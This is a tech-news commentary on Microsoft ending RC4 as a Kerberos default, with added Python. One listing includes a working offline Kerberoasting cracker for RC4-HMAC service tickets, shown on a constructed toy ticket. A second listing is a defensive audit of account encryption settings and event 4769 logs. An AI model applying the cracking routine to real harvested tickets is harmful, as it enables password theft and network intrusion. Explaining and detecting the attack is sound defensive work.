Microsoft Finally Kills Off a 26-Year-Old Hacker Magnet


According to Wired, Microsoft is finally killing off the obsolete and vulnerable RC4 encryption cipher that Windows has supported by default for 26 years. The company announced that by mid-2026 it will update domain controllers on Windows Server 2008 and later to allow only AES by default (the AES128/AES256-CTS-HMAC-SHA1-96 Kerberos encryption types, which the announcement abbreviates as AES-SHA1). This follows more than a decade of attacks exploiting RC4, including a key role in last year's breach of health giant Ascension, which disrupted 140 hospitals and compromised 5.6 million patient records. The move comes after blistering criticism from US Senator Ron Wyden, who in September accused Microsoft of "gross cybersecurity negligence" for keeping RC4 as a default fallback. Principal Program Manager Matthew Palko stated that RC4 will be disabled by default and will only work if an administrator explicitly re-enables it.


The 26-Year-Old Achilles Heel

Here's the thing about RC4: it was broken almost as soon as it became public. Ron Rivest designed it in 1987, and a workable attack was demonstrated in 1994, the same year the algorithm leaked. And yet Microsoft made RC4-HMAC the default cipher for Active Directory's Kerberos authentication when AD launched with Windows 2000. That's a mind-boggling timeline. The rest of the industry started removing RC4 from major protocols such as TLS roughly a decade ago. But Microsoft? It kept RC4 around as a default fallback, a courtesy to older systems that became a welcome mat for attackers. It's the definition of legacy baggage. The attack it enabled, Kerberoasting (request a service ticket for any account that has a service principal name, then crack the RC4-encrypted ticket offline to recover that account's password), became a hacker's holy grail for breaking into corporate networks. So why did it take so long?

The Legacy Trap

That's the multi-billion dollar question for enterprise IT. The answer is always the same: legacy systems. Microsoft added robust AES support to Active Directory years ago, with Windows Server 2008, and modern clients use it by default. But a domain controller, by default, would still politely answer a request for an RC4 ticket with an RC4 ticket, as long as the target account still allowed RC4, which every account did unless an administrator had set its msDS-SupportedEncryptionTypes attribute to AES only. And an RC4 ticket is encrypted under a key that is nothing more than the MD4 hash of the account's password, with no salt and no iteration, which is exactly why it cracks so quickly offline; the AES keys are derived with thousands of PBKDF2 iterations and a per-principal salt. The fallback existed for compatibility with ancient, often forgotten, third-party systems (think specialized manufacturing equipment, lab machines, or archival software) that only know how to speak RC4. Finding and updating or replacing those systems is a huge, expensive, disruptive chore. It's a classic trade-off: security versus operational continuity. Microsoft basically let admins kick the can down the road for over a decade, and attackers happily picked the can up every time. For companies running complex industrial operations, this kind of legacy dependency is a huge risk.
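To make the work-factor gap concrete, here is an added example (not code from Wired, Microsoft, or any product the article names) built only from the public specs: RFC 4757 for the RC4-HMAC string-to-key function and ticket encryption, RFC 3962 for the AES string-to-key PBKDF2 stage, and RFC 1320 for MD4. It derives both key types from the same password, encrypts a constructed toy "ticket" the way a KDC would encrypt a service ticket's enc-part under RC4-HMAC, and then runs the offline check that Kerberoasting tools perform per guess. The service password, the wordlist, the realm and principal names are all made up for the demonstration; MD4 is implemented inline because OpenSSL 3 builds of Python's hashlib often refuse to provide it.

```python
"""RC4-HMAC (etype 23) string-to-key and ticket cracking versus the AES work factor.
Added example built from RFC 4757 / RFC 3962 / RFC 1320. The ticket is a constructed
toy payload, not a real KRB_TGS_REP; MD4 is inline because hashlib may lack it."""
import hashlib
import hmac
import os
import struct

MASK = 0xFFFFFFFF


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4: the entire work factor of the RC4-HMAC string-to-key function."""
    bit_len = len(data) * 8
    data += b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", bit_len)
    rounds = (  # (boolean function, additive constant, word order, shift amounts) per round
        (lambda x, y, z: (x & y) | (~x & z), 0x00000000, range(16), (3, 7, 11, 19)),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999,
         (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1,
         (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(data), 64):
        x = struct.unpack("<16I", data[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for fn, const, order, shifts in rounds:
            for i, k in enumerate(order):
                a = _rotl((a + fn(b, c, d) + x[k] + const) & MASK, shifts[i % 4])
                a, b, c, d = d, a, b, c  # rotate the roles (A B C D) -> (D A B C)
        a, b, c, d = (a + aa) & MASK, (b + bb) & MASK, (c + cc) & MASK, (d + dd) & MASK
    return struct.pack("<4I", a, b, c, d)


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 keystream XOR (RFC 4757 uses it as the bulk cipher)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def rc4_hmac_key(password: str) -> bytes:
    """RFC 4757 string-to-key: one unsalted MD4 of the UTF-16LE password (the NT hash)."""
    return md4(password.encode("utf-16-le"))


def aes_string_to_key_pbkdf2(password: str, realm: str, principal: str) -> bytes:
    """RFC 3962 string-to-key, PBKDF2 stage only (the final DK() AES step is omitted):
    salted with realm+principal, so nothing precomputes, and 4096 HMAC-SHA1 per guess."""
    return hashlib.pbkdf2_hmac("sha1", password.encode(), (realm + principal).encode(), 4096, 32)


USAGE_TGS_REP_TICKET = 2  # Kerberos key usage number for the service ticket's enc-part


def rc4_hmac_encrypt(key: bytes, plaintext: bytes, usage: int = USAGE_TGS_REP_TICKET) -> bytes:
    """RFC 4757 encrypt: output = HMAC-MD5 checksum (16 bytes) || RC4(confounder || plaintext)."""
    confounder = os.urandom(8)
    k1 = hmac.new(key, struct.pack("<I", usage), hashlib.md5).digest()
    checksum = hmac.new(k1, confounder + plaintext, hashlib.md5).digest()
    k3 = hmac.new(k1, checksum, hashlib.md5).digest()
    return checksum + rc4(k3, confounder + plaintext)


def kerberoast_crack(enc_part: bytes, wordlist, usage: int = USAGE_TGS_REP_TICKET):
    """Per guess: one MD4, three HMAC-MD5 and one RC4 pass, then compare the checksum.
    This is the whole offline check; no salt means one pass serves every RC4 ticket."""
    checksum, edata = enc_part[:16], enc_part[16:]
    for guess in wordlist:
        k1 = hmac.new(rc4_hmac_key(guess), struct.pack("<I", usage), hashlib.md5).digest()
        k3 = hmac.new(k1, checksum, hashlib.md5).digest()
        plain = rc4(k3, edata)  # confounder || plaintext only if the key is right
        if hmac.compare_digest(hmac.new(k1, plain, hashlib.md5).digest(), checksum):
            return guess
    return None


def demo():
    """Constructed scenario: a service account with a guessable password, tiny wordlist."""
    ticket = rc4_hmac_encrypt(rc4_hmac_key("Summer2024!"), b"constructed EncTicketPart for HTTP/web01")
    return kerberoast_crack(ticket, ["Welcome1", "Password123", "Summer2024!", "Winter2024!"])


if __name__ == "__main__":
    print("cracked service password:", demo())
```

The asymmetry is the point: `rc4_hmac_key` is a single hash with no salt, so an attacker can precompute NT hashes for a wordlist once and test them against every RC4 ticket harvested from the domain, while `aes_string_to_key_pbkdf2` costs 4096 HMAC-SHA1 per guess and is tied to one realm and principal. Flipping a service account to AES-only does not make the password strong, but it removes the cheap path.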

Better Late Than Never?

So the change is coming, but not until mid-2026. That's the better part of a year more of default exposure, though admins can disable RC4 themselves now rather than wait. The onus is now completely on network administrators to find those legacy systems hiding in the shadows. Matthew Palko's warning is crucial: scan your network now. In practice that means auditing which accounts still allow RC4 (the msDS-SupportedEncryptionTypes attribute, or its absence) and watching domain controller audit logs for service tickets, event ID 4769, issued with RC4 encryption. If you have a system that absolutely can't be upgraded and needs RC4, you'll have to explicitly re-enable it for that one account, creating a known and contained vulnerability instead of an invisible one. It's a messy, manual cleanup job that should have started years ago. But look, finally flipping the default is a massive step. It means new deployments won't inherit this weakness, and it forces a long-overdue reckoning for old ones. The Ascension breach showed this isn't just a theoretical issue; it's a matter of life and death. Turning RC4 off by default should have happened alongside the release of Windows Server 2008, when AES support arrived. Better late than never, I guess, but "late" doesn't begin to cover it.
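The "scan your network now" step, as an added example that is not part of the original article or of Microsoft's guidance: two small triage routines, one over the msDS-SupportedEncryptionTypes values of accounts that carry a service principal name (the kind of export an admin would pull with `Get-ADObject -LDAPFilter '(servicePrincipalName=*)' -Properties msDS-SupportedEncryptionTypes`), and one over Security event 4769 records in the XML shape `Get-WinEvent` returns from `.ToXml()`. The account list and the event records below are constructed stand-ins, and the names (svc_sql, CORP.EXAMPLE, the IP addresses) are invented. The second routine goes a little beyond the article's point: besides counting RC4 tickets per service, it flags a single requester pulling RC4 tickets for many distinct services, which is the usual Kerberoasting pattern in DC logs.

```python
"""Triage for the RC4 cleanup: which accounts still allow RC4, and which service
tickets a domain controller is actually issuing with it. Added example; inputs are
constructed stand-ins for an msDS-SupportedEncryptionTypes export and 4769 event XML."""
import xml.etree.ElementTree as ET
from collections import defaultdict

# msDS-SupportedEncryptionTypes bit flags ([MS-KILE]); an unset attribute reads as None
DES_CBC_CRC, DES_CBC_MD5, RC4_HMAC, AES128, AES256, AES256_SK = 0x1, 0x2, 0x4, 0x8, 0x10, 0x20
FLAG_NAMES = {DES_CBC_CRC: "DES-CBC-CRC", DES_CBC_MD5: "DES-CBC-MD5", RC4_HMAC: "RC4-HMAC",
              AES128: "AES128", AES256: "AES256", AES256_SK: "AES256-SK"}
RC4_ETYPES = {0x17, 0x18}  # RC4-HMAC / RC4-HMAC-EXP as logged in 4769 TicketEncryptionType
EVENT_NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}


def flag_list(et: int) -> str:
    return ",".join(name for bit, name in FLAG_NAMES.items() if et & bit) or "none"


def classify_account(supported_enc_types) -> str:
    """Verdict for one account's msDS-SupportedEncryptionTypes value (None if unset)."""
    et = supported_enc_types or 0
    if et == 0:
        return "RC4_FALLBACK"   # unset: the historical default the article describes, RC4
    if not et & (AES128 | AES256):
        return "NO_AES"         # explicitly configured without AES
    if et & RC4_HMAC:
        return "RC4_ALLOWED"    # AES used normally, but a requester may still obtain RC4
    return "AES_ONLY"


def audit_accounts(accounts):
    """accounts: iterable of (sAMAccountName, msDS-SupportedEncryptionTypes or None)."""
    return {name: (classify_account(et), flag_list(et or 0)) for name, et in accounts}


def parse_4769(xml_text: str) -> dict:
    """Flatten the EventData of one 4769 record (shape of EventLogRecord.ToXml())."""
    root = ET.fromstring(xml_text)
    d = {el.get("Name"): (el.text or "") for el in root.findall("e:EventData/e:Data", EVENT_NS)}
    d["etype"] = int(d.get("TicketEncryptionType", "0x0"), 16)
    return d


def rc4_ticket_report(xml_records, roast_threshold: int = 5):
    """Return (RC4 ticket count per service, requesters that obtained RC4 tickets for at
    least roast_threshold distinct services). The second is the Kerberoasting signature:
    one principal harvesting many SPN accounts' tickets, all downgraded to RC4."""
    per_service = defaultdict(int)
    services_per_client = defaultdict(set)
    for rec in xml_records:
        d = parse_4769(rec)
        if d["etype"] in RC4_ETYPES and d.get("Status", "0x0") == "0x0":
            per_service[d["ServiceName"]] += 1
            services_per_client[(d["TargetUserName"], d["IpAddress"])].add(d["ServiceName"])
    suspicious = {client: sorted(svcs) for client, svcs in services_per_client.items()
                  if len(svcs) >= roast_threshold}
    return dict(per_service), suspicious


def _event(user, service, etype, ip):
    """Constructed 4769 XML trimmed to the fields used above (real records carry more)."""
    return (f'<Event xmlns="{EVENT_NS["e"]}"><System><EventID>4769</EventID></System>'
            f'<EventData><Data Name="TargetUserName">{user}</Data>'
            f'<Data Name="ServiceName">{service}</Data>'
            f'<Data Name="TicketEncryptionType">{etype}</Data>'
            f'<Data Name="IpAddress">{ip}</Data><Data Name="Status">0x0</Data>'
            f'</EventData></Event>')


SAMPLE_ACCOUNTS = [           # constructed
    ("svc_sql", None),        # never touched: silent RC4 fallback
    ("svc_legacy_plc", 0x4),  # RC4 only, the "known and contained" exception
    ("svc_web", 0x1C),        # RC4 + AES128 + AES256: AES normally, RC4 on request
    ("svc_backup", 0x18),     # AES only
]
SAMPLE_EVENTS = (             # constructed: one AES ticket, one roasting burst, one legacy PLC
    [_event("alice@CORP.EXAMPLE", "cifs/fs01", "0x12", "10.0.0.5")]
    + [_event("bob@CORP.EXAMPLE", s, "0x17", "10.0.0.77")
       for s in ("svc_sql", "svc_web", "svc_legacy_plc", "svc_http", "svc_mq", "svc_ftp")]
    + [_event("plc01$@CORP.EXAMPLE", "svc_legacy_plc", "0x17", "10.0.9.3")]
)

if __name__ == "__main__":
    for name, (verdict, flags) in audit_accounts(SAMPLE_ACCOUNTS).items():
        print(f"{name:16} {verdict:13} {flags}")
    per_service, suspicious = rc4_ticket_report(SAMPLE_EVENTS)
    print("RC4 tickets per service:", per_service)
    print("possible Kerberoasting:", suspicious)
```

Two caveats when running this against real data. An `RC4_ALLOWED` account still hands out RC4 tickets to any client that asks only for RC4, which is exactly what roasting tools do, so it is not safe merely because AES is also listed. And setting the attribute to AES-only does not by itself create AES keys: an account whose password has not changed since before the domain supported AES has no AES keys for the KDC to use, so the password has to be reset as part of the change.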
